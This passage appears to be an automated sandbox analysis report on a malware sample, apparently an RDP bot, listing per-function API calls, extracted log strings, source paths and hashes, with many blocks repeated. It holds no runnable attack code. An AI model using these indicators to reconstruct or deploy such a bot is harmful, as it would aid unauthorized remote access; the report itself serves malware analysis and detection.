                                    • Instruction Fuzzy Hash: 9D116D92B0C6D344FE1A5A35ED257B566A11F13B88F4C4030DE0D8A2A6EEACAC11C242
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                    • API String ID: 1799206407-4111913120
                                    • Opcode ID: 2c62e7f74456b261eda3a56a5f0472945fabecd707f98314b876e7eb4c98184f
                                    • Instruction ID: 66a6eb33ef6d043d45f5df7ea214acc490402f35332ee6538f97abc7a9d8c4d7
                                    • Opcode Fuzzy Hash: 2c62e7f74456b261eda3a56a5f0472945fabecd707f98314b876e7eb4c98184f
                                    • Instruction Fuzzy Hash: 8B21AFD0F0D6C392FB3A4678DC9437951609F43309FA0053AE11EDE2B9CEADAC859283
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: inet_addr
                                    • String ID: (s != NULL)$(v != NULL)$C:/Projects/rdp/bot/codebase/net.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$ip4_from_str
                                    • API String ID: 1393076350-1216860922
                                    • Opcode ID: 27558201fc945488416f0c09e9fe0ba5faac68ad3d865013deeb4a46647f752f
                                    • Instruction ID: feff7510903685a9b543f8cc81451b4ce1237991095a16359e338ac3cb6e6e73
                                    • Opcode Fuzzy Hash: 27558201fc945488416f0c09e9fe0ba5faac68ad3d865013deeb4a46647f752f
                                    • Instruction Fuzzy Hash: 7711F5E1A0C58782FF129B34EC112F82261AF12308F444235D91D8A1B4EFBCED46E341
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastLibraryLoadProc
                                    • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                    • API String ID: 3511525774-1584720945
                                    • Opcode ID: 864cba44ca97bf7edcb33a3b14e650b8a18afea84fbaf8def9057ab66fd9ce8b
                                    • Instruction ID: 1f06611cd136f71b009bcd4f002b9b38cb5e0df23ba6a16a41f44e62d957a670
                                    • Opcode Fuzzy Hash: 864cba44ca97bf7edcb33a3b14e650b8a18afea84fbaf8def9057ab66fd9ce8b
                                    • Instruction Fuzzy Hash: 19114FE0E1D68391FE129B35EC517B422A0AF56744F441035D85EC66B1EEEDBD58C342
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Service$CloseControlErrorHandleLastOpen
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    • API String ID: 3311966420-638458398
                                    • Opcode ID: 002457e411450f8fa99a83fc6859164a5778e39736ed89b876f985500c632e71
                                    • Instruction ID: 3c50750e534c41b76bc66501e124d7cd55b21e8e8aab818db7c17fdfe43df7cb
                                    • Opcode Fuzzy Hash: 002457e411450f8fa99a83fc6859164a5778e39736ed89b876f985500c632e71
                                    • Instruction Fuzzy Hash: C50135E1B0CA8381FA229B35EC4427952A0BF06B84F845436CA4DCB3B0EEBCAC448301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Service$CloseControlErrorHandleLastOpen
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    • API String ID: 3311966420-638458398
                                    • Opcode ID: 002457e411450f8fa99a83fc6859164a5778e39736ed89b876f985500c632e71
                                    • Instruction ID: 3c50750e534c41b76bc66501e124d7cd55b21e8e8aab818db7c17fdfe43df7cb
                                    • Opcode Fuzzy Hash: 002457e411450f8fa99a83fc6859164a5778e39736ed89b876f985500c632e71
                                    • Instruction Fuzzy Hash: C50135E1B0CA8381FA229B35EC4427952A0BF06B84F845436CA4DCB3B0EEBCAC448301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: LibraryLoadResource$FindFree
                                    • String ID: (ver != NULL)$C:/Projects/rdp/bot/rpd-controller/rdp.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$rdp_version$termsrv.dll
                                    • API String ID: 3272429154-2519045969
                                    • Opcode ID: ab470ca301d23fdc5eb326f0d7197a22969c08579847cbe546a7a8822d7a6ee9
                                    • Instruction ID: 619184db252f6778adb03f47818c4b233b424fae1833ecee96386c7b18be38e1
                                    • Opcode Fuzzy Hash: ab470ca301d23fdc5eb326f0d7197a22969c08579847cbe546a7a8822d7a6ee9
                                    • Instruction Fuzzy Hash: 6EF0ECD1B0E6CB81FF12EB71EC545B46260AF46744F840135D94D863B1EEACBD4AD305
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$Heap$CloseDeleteEnterFreeHandleLeaveObjectProcessSingleWait
                                    • String ID: Done$[I] (%s) -> %s$ebus_cleanup
                                    • API String ID: 3198640931-3713968270
                                    • Opcode ID: b85e3b5bd7b285eeaef46b5be38c830201cde683806f94eac2d76a944e22bfa9
                                    • Instruction ID: 87347dba334d2ff8fd28563a08d4b4083bacb1d95ea85d97db840b05674115f3
                                    • Opcode Fuzzy Hash: b85e3b5bd7b285eeaef46b5be38c830201cde683806f94eac2d76a944e22bfa9
                                    • Instruction Fuzzy Hash: F801C2A1A2C9C281FB129B34EC653787260AF56730F504335D8BD862F0DFECAC559342
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                                    • API String ID: 2962429428-1801624891
                                    • Opcode ID: fc10055c64f6071bb9d6228ada1094c04c8fcfc9b41819313f97703f498a23d6
                                    • Instruction ID: 57914b2d00a160dad8e64facc9704dc1ab186fc08564830d329668b4064057dd
                                    • Opcode Fuzzy Hash: fc10055c64f6071bb9d6228ada1094c04c8fcfc9b41819313f97703f498a23d6
                                    • Instruction Fuzzy Hash: 72F0F8E1A5D88B81FE02DB34FC102A42320AB42788F454136D90D872749EACED56C311
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?,?,00007FFB22745034,?,?,00007FFB227311A1), ref: 00007FFB227405E2
                                    Strings
                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FFB2274050B
                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FFB22740482
                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FFB2274057D
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                    • API String ID: 544645111-1286557213
                                    • Opcode ID: 9dd09dc7ed375448d2989ebb7bbce778407ab74c03ffeac50a15ff0a8d23e62d
                                    • Instruction ID: 6c9d8df4c1f607ff5a7b324a43f2ceecf067e2ebb30e50c7a218fe0b12b2d849
                                    • Opcode Fuzzy Hash: 9dd09dc7ed375448d2989ebb7bbce778407ab74c03ffeac50a15ff0a8d23e62d
                                    • Instruction Fuzzy Hash: 906159A2F1C69286FE1A8B75DD406B872B0EB47B94F448135DA5C877E5DEBCE980C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CloseHandleService
                                    • String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
                                    • API String ID: 1725840886-2743387298
                                    • Opcode ID: 34afd658e9610579becb046621adafd38131ca6ce25e9f297a7b029d37065a75
                                    • Instruction ID: cdfd4b57eea9e4974756ef30b3b34d7412602d8ded0eb53f4788c7ce0ec26b6e
                                    • Opcode Fuzzy Hash: 34afd658e9610579becb046621adafd38131ca6ce25e9f297a7b029d37065a75
                                    • Instruction Fuzzy Hash: 2B013CD2B0C28341FA635A75EC812B951806F53744F88013ADE5DC62B0DEFCAD858202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 5fb27d87997a0456c4b3bb2036d8ec720e397794cd357dbc5771efa51323e346
                                    • Instruction ID: 0cc5733757a7c8823209c7b02e60ab691d84418bb60b7e95a5531fb63a51c161
                                    • Opcode Fuzzy Hash: 5fb27d87997a0456c4b3bb2036d8ec720e397794cd357dbc5771efa51323e346
                                    • Instruction Fuzzy Hash: E1F0BEA3F0D28381F9139A24FC517B812512F92770F0905318D5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 01a02412ab8275c36465b68411a2af4964e092d8c3a43a4fad68f3ebd8b1bdb2
                                    • Instruction ID: 51cafd36d0c0164894aa508aa5adb3db03acce67f79b0cc0cafb3dc0ce09d4ed
                                    • Opcode Fuzzy Hash: 01a02412ab8275c36465b68411a2af4964e092d8c3a43a4fad68f3ebd8b1bdb2
                                    • Instruction Fuzzy Hash: 7FF0BEA3B0D28381F9139A24FC517B812512F92775F0905318D5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 4870d544d535033029d480653b6722bb726d195aed30ebe31d3fc1a3d62f9b41
                                    • Instruction ID: c7d6fbec5833cde370d4a62ed17c90907a454781013b8645b827509de6b68715
                                    • Opcode Fuzzy Hash: 4870d544d535033029d480653b6722bb726d195aed30ebe31d3fc1a3d62f9b41
                                    • Instruction Fuzzy Hash: A9F0BEA3B0D28381F9139A24FC517B912512F92774F0905318D5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: b31d3a5901d0513704d4fe754bffd3a407be5763b5c741f5472f0051b2e3fa67
                                    • Instruction ID: 58cad8d1a557d7e5dc081512fd3eb9598f11a9f35a92f38aa1bc2f51e7dc6af1
                                    • Opcode Fuzzy Hash: b31d3a5901d0513704d4fe754bffd3a407be5763b5c741f5472f0051b2e3fa67
                                    • Instruction Fuzzy Hash: 3BF0BEA3F0D28381F9139A24FC517B812512F92774F090531CD5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 79f5628ac98b178e595bceb9258ce74583370275243635646760adc4866a2855
                                    • Instruction ID: 490b8c260b48c51114f5de9cbe4706f100b6b1ed0c9f65154b68bdaa84ff0c8d
                                    • Opcode Fuzzy Hash: 79f5628ac98b178e595bceb9258ce74583370275243635646760adc4866a2855
                                    • Instruction Fuzzy Hash: D6F0BEA3B0D28381F9139A24FC517B852512F92774F0905328D5C8AAE1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 79f5628ac98b178e595bceb9258ce74583370275243635646760adc4866a2855
                                    • Instruction ID: 490b8c260b48c51114f5de9cbe4706f100b6b1ed0c9f65154b68bdaa84ff0c8d
                                    • Opcode Fuzzy Hash: 79f5628ac98b178e595bceb9258ce74583370275243635646760adc4866a2855
                                    • Instruction Fuzzy Hash: D6F0BEA3B0D28381F9139A24FC517B852512F92774F0905328D5C8AAE1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 5fb27d87997a0456c4b3bb2036d8ec720e397794cd357dbc5771efa51323e346
                                    • Instruction ID: 0cc5733757a7c8823209c7b02e60ab691d84418bb60b7e95a5531fb63a51c161
                                    • Opcode Fuzzy Hash: 5fb27d87997a0456c4b3bb2036d8ec720e397794cd357dbc5771efa51323e346
                                    • Instruction Fuzzy Hash: E1F0BEA3F0D28381F9139A24FC517B812512F92770F0905318D5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 01a02412ab8275c36465b68411a2af4964e092d8c3a43a4fad68f3ebd8b1bdb2
                                    • Instruction ID: 51cafd36d0c0164894aa508aa5adb3db03acce67f79b0cc0cafb3dc0ce09d4ed
                                    • Opcode Fuzzy Hash: 01a02412ab8275c36465b68411a2af4964e092d8c3a43a4fad68f3ebd8b1bdb2
                                    • Instruction Fuzzy Hash: 7FF0BEA3B0D28381F9139A24FC517B812512F92775F0905318D5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 4870d544d535033029d480653b6722bb726d195aed30ebe31d3fc1a3d62f9b41
                                    • Instruction ID: c7d6fbec5833cde370d4a62ed17c90907a454781013b8645b827509de6b68715
